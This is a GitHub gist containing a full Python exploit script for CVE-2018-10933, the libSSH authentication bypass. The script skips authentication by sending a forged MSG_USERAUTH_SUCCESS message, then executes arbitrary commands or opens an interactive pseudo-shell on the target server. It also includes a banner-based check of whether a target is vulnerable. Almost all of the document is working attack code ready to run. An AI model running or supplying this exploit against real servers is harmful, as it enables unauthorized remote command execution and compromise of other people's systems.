-
-
Save jam620/599b33e3a7698c9570d13ccef482dcc0 to your computer and use it in GitHub Desktop.
CVE-2018-10933 libSSH authentication bypass exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
# | |
# CVE-2018-10933 libSSH authentication bypass exploit
# | |
# The libSSH library has a flawed authentication/connection state machine.
# MSG_USERAUTH_SUCCESS (described in RFC 4252, sec. 5.1) is an authentication
# response message that should only ever be sent by the server itself and
# never accepted from a client. Upon receiving this message from a connecting
# client, however, libSSH switches to the successful post-authentication
# state. In that state it treats the connecting client as the server's root
# user and begins executing delivered commands.
# This results in an authenticated remote-access channel being opened
# without any authentication attempt (authentication bypass).
# | |
# Below exploit contains modified code taken from: | |
# - https://github.com/leapsecurity/libssh-scanner | |
# | |
# Known issues: | |
# - The original shell implementation (UnauthSSH.NOT_WORKING_shell()) does not work:
#   I never got paramiko.Channel.invoke_shell() working with a custom
#   transport object. As a workaround, `UnauthSSH.parashell()` was
#   implemented; it substitutes for the original shell-spawning functionality.
# | |
# Requirements: | |
# - paramiko | |
# | |
# Mariusz B. / mgeeky, <[email protected]> | |
# | |
import argparse
import re
import socket
import sys
import time
from sys import argv, exit

try:
    import paramiko
except ImportError:
    print('[!] Paramiko required: python3 -m pip install paramiko')
    sys.exit(1)
# Version string printed in the start-up banner.
VERSION = '0.1'

# Global runtime settings. Defaults live here; parse_opts() overwrites the
# entries that correspond to command-line options.
config = {
    'debug': False,              # print '[dbg]' diagnostics
    'verbose': False,            # print informational messages
    'host': '',                  # target hostname / IP address
    'port': 22,                  # target TCP port
    'log': '',                   # paramiko log file path ('' disables it)
    'connection_timeout': 5.0,   # seconds, TCP connect / SSH negotiation
    'session_timeout': 10.0,     # seconds, channel opening
    'buflen': 4096,              # bytes requested per recv() call
    'command': '',               # single command to run ('' means none)
    'shell': False,              # spawn the pseudo-shell instead
}
class Logger:
    """Tiny console logger driven by the global ``config`` flags.

    Everything is written to stdout. ``err`` always prints; ``dbg`` prints
    only when ``config['debug']`` is set; the remaining helpers print when
    either ``config['debug']`` or ``config['verbose']`` is set.

    Messages are passed through ``str()`` so that non-string objects (for
    example exception instances) can be logged directly.
    """

    @staticmethod
    def _out(x):
        """Write *x* followed by a newline if verbose or debug is enabled."""
        if config['debug'] or config['verbose']:
            sys.stdout.write(str(x) + '\n')

    @staticmethod
    def dbg(x):
        """Write a '[dbg]' message; shown only in debug mode."""
        if config['debug']:
            sys.stdout.write('[dbg] ' + str(x) + '\n')

    @staticmethod
    def out(x):
        """Write a neutral '[.]' message."""
        Logger._out('[.] ' + str(x))

    @staticmethod
    def info(x):
        """Write an informational '[?]' message."""
        Logger._out('[?] ' + str(x))

    @staticmethod
    def err(x):
        """Write an error '[!]' message; shown regardless of verbosity."""
        sys.stdout.write('[!] ' + str(x) + '\n')

    @staticmethod
    def fail(x):
        """Write a failure '[-]' message."""
        Logger._out('[-] ' + str(x))

    @staticmethod
    def ok(x):
        """Write a success '[+]' message."""
        Logger._out('[+] ' + str(x))
class UnauthSSH():
    """SSH client wrapper that sends MSG_USERAUTH_SUCCESS instead of authenticating.

    Host and port are read from the global ``config`` at construction time.
    One socket / paramiko transport pair is kept and reused between commands
    for as long as the transport stays active.
    """

    def __init__(self):
        self.host = config['host']
        self.port = config['port']
        self.sock = None
        self.transport = None
        # Ensures the 'Connecting with ...' line is logged only once.
        self.connectionInfoOnce = False

    def __del__(self):
        self._close()

    def _close(self):
        """Close the current transport and socket, if any (best effort)."""
        # getattr(): __del__ may run on an instance whose __init__ did not
        # complete, in which case the attributes do not exist yet.
        resources = (getattr(self, 'transport', None), getattr(self, 'sock', None))
        self.transport = None
        self.sock = None
        for resource in resources:
            if resource is None:
                continue
            try:
                resource.close()
            except OSError:
                # Nothing useful can be done about a failing close().
                pass

    def sshAuthBypass(self, force = False):
        """Return a transport on which MSG_USERAUTH_SUCCESS has been sent.

        An already active transport is reused unless *force* is true.
        Exits the process with status 1 when the TCP connection cannot be
        established. Errors raised by paramiko during SSH negotiation are
        propagated after the half-open transport has been closed.
        """
        if not force and (self.transport and self.transport.is_active()):
            Logger.dbg('Returning already issued SSH Transport')
            return self.transport

        # Drop whatever is left from a previous (dead or forced-out) connection.
        self._close()

        if not self.connectionInfoOnce:
            self.connectionInfoOnce = True
            Logger.info('Connecting with {}:{} ...'.format(
                self.host, self.port
            ))

        try:
            self.sock = socket.create_connection(
                (str(self.host), int(self.port)),
                timeout = config['connection_timeout']
            )
            Logger.ok('Connected.')
        except (OSError, ValueError, OverflowError) as e:
            # Logger.err: the reason must be visible even without -v,
            # because the process terminates right here.
            Logger.err('Could not connect to {}:{} . Exception: {}'.format(
                self.host, self.port, str(e)
            ))
            sys.exit(1)

        message = paramiko.message.Message()
        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)

        transport = paramiko.transport.Transport(self.sock)
        try:
            transport.start_client(timeout = config['connection_timeout'])
            transport._send_message(message)
        except Exception:
            # Do not leave a half-negotiated transport behind.
            transport.close()
            raise

        self.transport = transport
        return transport

    def NOT_WORKING_shell(self):
        """Interactive shell based on invoke_shell(); kept for reference only."""
        # FIXME: invoke_shell() closes channel prematurely.
        transport = self.sshAuthBypass()
        session = transport.open_session(timeout = config['session_timeout'])
        session.set_combine_stderr(True)
        session.get_pty()
        session.invoke_shell()

        username = UnauthSSH._send_recv(session, 'whoami')
        hostname = UnauthSSH._send_recv(session, 'hostname')
        prompt = '{}@{} $ '.format(username, hostname)

        while True:
            inp = input(prompt).strip()
            if inp.lower() in ['exit', 'quit'] or not inp:
                Logger.info('Quitting...')
                break

            out = UnauthSSH._send_recv(session, inp)
            if not out:
                Logger.err('Could not constitute stable shell.')
                return
            print(out)

    def shell(self):
        """Spawn the interactive pseudo-shell (delegates to parashell())."""
        self.parashell()

    def parashell(self):
        """Pseudo-shell: every entered line is run as a separate command.

        'exit', 'quit', an empty line, EOF or Ctrl-C leaves the loop.
        """
        username = self.execute('whoami')
        hostname = self.execute('hostname')

        if not username or not hostname:
            # Logger.err: in shell mode verbose output is normally off and
            # the user would otherwise get no explanation at all.
            Logger.err('Could not obtain username ({}) and/or hostname ({})!'.format(
                username, hostname
            ))
            return

        prompt = '{}@{} $ '.format(username, hostname)
        Logger.info('Entering pseudo-shell...')

        while True:
            try:
                inp = input(prompt).strip()
            except (EOFError, KeyboardInterrupt):
                print()
                Logger.info('Quitting...')
                break

            if inp.lower() in ['exit', 'quit'] or not inp:
                Logger.info('Quitting...')
                break

            # _run() returns None on failure, which keeps a command that
            # legitimately prints nothing from being mistaken for a dead
            # connection.
            out = self._run(inp)
            if out is None:
                Logger.err('Could not constitute stable shell.')
                return
            if out:
                print(out)

    # FIXME: Not used as NOT_WORKING_shell() is bugged.
    @staticmethod
    def _send_recv(session, cmd):
        """Send *cmd* over an interactive channel and collect its output.

        Returns None when the exit status is not ready within
        ``config['session_timeout']`` seconds.
        """
        out = ''
        session.send(cmd.strip() + '\n')

        MAX_TIMEOUT = config['session_timeout']
        timeout = 0.0

        while not session.exit_status_ready():
            time.sleep(0.1)
            timeout += 0.1
            if timeout > MAX_TIMEOUT:
                return None

            if session.recv_ready():
                out += session.recv(config['buflen']).decode()
            if session.recv_stderr_ready():
                out += session.recv_stderr(config['buflen']).decode()

        while session.recv_ready():
            out += session.recv(config['buflen']).decode()

        return out

    @staticmethod
    def _exec(session, inp):
        """Run *inp* on *session* and return its stripped, decoded output."""
        inp = inp.strip()
        Logger.dbg('Executing command: "{}"'.format(inp))
        session.exec_command(inp + '\n')

        # Drain the channel before asking for the exit status: waiting for
        # the status first can block when the output is large. recv()
        # returns an empty bytes object once the stream is closed.
        chunks = []
        while True:
            chunk = session.recv(config['buflen'])
            if not chunk:
                break
            chunks.append(chunk)

        retcode = session.recv_exit_status()
        Logger.dbg('Exit status: {}'.format(retcode))

        # Decode once, after joining, so that a multi-byte character split
        # across two chunks cannot break decoding.
        buf = b''.join(chunks).decode(errors = 'replace').strip()
        Logger.dbg('Returned:\n{}'.format(buf))
        return buf

    def _run(self, cmd, printout = False, tryAgain = False):
        """Run *cmd* in a fresh channel.

        Returns the command output, or None on failure. A 'channel closed'
        error triggers exactly one retry over a new connection.
        """
        session = None
        try:
            transport = self.sshAuthBypass(force = tryAgain)
            session = transport.open_session(timeout = config['session_timeout'])
            session.set_combine_stderr(True)
            return UnauthSSH._exec(session, cmd)
        except (paramiko.SSHException, EOFError, OSError) as e:
            if 'channel closed' in str(e).lower() and not tryAgain:
                return self._run(cmd, printout, True)

            report = Logger.fail if printout else Logger.dbg
            report('Could not execute command ({}): "{}"'.format(cmd, str(e)))
            return None
        finally:
            if session is not None:
                session.close()

    def execute(self, cmd, printout = False, tryAgain = False):
        """Run *cmd* on the target and return its output.

        Returns an empty string when the command could not be executed.
        With *printout* set, the command and its output are also printed.
        *tryAgain* forces a new connection and disables the automatic retry.
        """
        buf = self._run(cmd, printout, tryAgain)
        if buf is None:
            return ''

        if printout:
            print('\n{} $ {}'.format(self.host, cmd))
            print('{}'.format(buf))

        return buf
def exploit():
    """Run the configured single command, or start the pseudo-shell.

    With ``config['command']`` set, the command is executed once and its
    output printed; otherwise UnauthSSH.shell() is started.
    """
    handler = UnauthSSH()

    if not config['command']:
        handler.shell()
        return

    out = handler.execute(config['command'])
    # The '$ <command>' echo is shown only in verbose/debug mode.
    Logger._out('\n$ {}'.format(config['command']))
    print(out)
def collectBanner():
    """Connect to the configured target and return the first banner line.

    Returns the bytes up to (not including) the first newline of whatever
    the server sent, or an empty bytes object when connecting or reading
    fails or times out.
    """
    ip = config['host']
    port = config['port']

    try:
        # The 'with' block closes the socket on every path. The connect
        # timeout stays in force for recv() as well, so a server that never
        # sends a banner cannot block the scan forever.
        with socket.create_connection((ip, port), timeout = config['connection_timeout']) as s:
            Logger.ok('Connected to the target: {}:{}'.format(ip, port))
            banner = s.recv(config['buflen'])
    except OSError as e:
        # socket.timeout and socket.error are both OSError.
        Logger.fail('SSH connection failed or timed out: {}'.format(e))
        return b""

    return banner.split(b"\n")[0]
def _libssh_version(banner):
    """Return (major, minor, patch) parsed from a libssh banner, or None.

    A banner that carries no patch component yields patch 0.
    """
    match = re.search(rb'libssh[-_](\d+)\.(\d+)(?:\.(\d+))?', banner)
    if match is None:
        return None

    major, minor, patch = match.groups()
    return (int(major), int(minor), int(patch) if patch is not None else 0)


def check():
    """Fingerprint the target by its SSH banner.

    Turns verbose output on when neither a command nor the shell was
    requested (detect-only mode), so that the verdict is actually printed.

    Returns True only when the banner indicates a libssh version that seems
    vulnerable; False when it seems patched, is not a 0.6-0.8 libssh
    banner, or no banner could be collected.
    """
    if not config['command'] and not config['shell']:
        config['verbose'] = True

    banner = collectBanner()
    if not banner:
        Logger.err('Could not obtain SSH service banner.')
        return False

    # errors='replace': a banner with undecodable bytes must not abort the scan.
    Logger.info('Obtained banner: "{}"'.format(
        banner.decode(errors = 'replace').strip()
    ))

    #
    # NOTICE: The version ranges below follow the logic taken from:
    #   - https://github.com/leapsecurity/libssh-scanner
    #
    version = _libssh_version(banner)
    if version is None or not ((0, 6, 0) <= version < (0, 9, 0)):
        Logger.fail('Target is not vulnerable.')
        return False

    # libssh 0.7.6 or greater in the 0.7 series, and 0.8.4 or greater in
    # the 0.8 series, are patched.
    if (0, 7, 6) <= version < (0, 8, 0) or version >= (0, 8, 4):
        Logger.info('Target seems to be PATCHED.')
        return False

    Logger.ok('Target seems to be VULNERABLE!')
    return True
def parse_opts():
    """Parse the command line into the global ``config``.

    Returns True on success. Returns False, after printing the usage help,
    when the options are inconsistent (both --shell and --command given, or
    a port outside 1-65535).
    """
    parser = argparse.ArgumentParser(description = 'If there was neither shell nor command option specified - exploit will switch to detect mode yielding vulnerable/not vulnerable flag.')
    parser.add_argument('host', help='Hostname/IP address that is running vulnerable libSSH server.')
    # type=int: without it a user-supplied port arrives as a string while
    # the default is an integer.
    parser.add_argument('-p', '--port', help='libSSH port', type = int, default = 22)
    parser.add_argument('-s', '--shell', help='Exploit the vulnerability and spawn pseudo-shell', action='store_true', default = False)
    parser.add_argument('-c', '--command', help='Execute single command. ', default='')
    parser.add_argument('--logfile', help='Logfile to write paramiko connection logs', default = "")
    parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
    parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.')

    args = parser.parse_args()

    config['host'] = args.host
    config['port'] = args.port
    config['log'] = args.logfile
    config['command'] = args.command
    config['shell'] = args.shell
    config['verbose'] = args.verbose
    config['debug'] = args.debug

    if args.shell and args.command:
        Logger.err('Shell and command options are mutually exclusive!\n')
        parser.print_help()
        return False

    if not 0 < args.port < 65536:
        Logger.err('Port must be in range 1-65535!\n')
        parser.print_help()
        return False

    return True
def main():
    """Script entry point: print the banner, parse options, check, then act.

    Returns False when the command-line options are rejected and None
    otherwise.
    """
    sys.stderr.write((
        '\n'
        ':: CVE-2018-10933 libSSH authentication bypass exploit.\n'
        'Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication.\n'
        "Mariusz B. / mgeeky '18, <[email protected]>\n"
        'v{}\n'
    ).format(VERSION))

    if not parse_opts():
        return False

    if config['log']:
        paramiko.util.log_to_file(config['log'])

    # The banner check is informational only; its verdict does not gate
    # the steps below.
    check()

    if config['command'] or config['shell']:
        exploit()


if __name__ == '__main__':
    # Report rejected command-line options through the exit status.
    sys.exit(1 if main() is False else 0)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment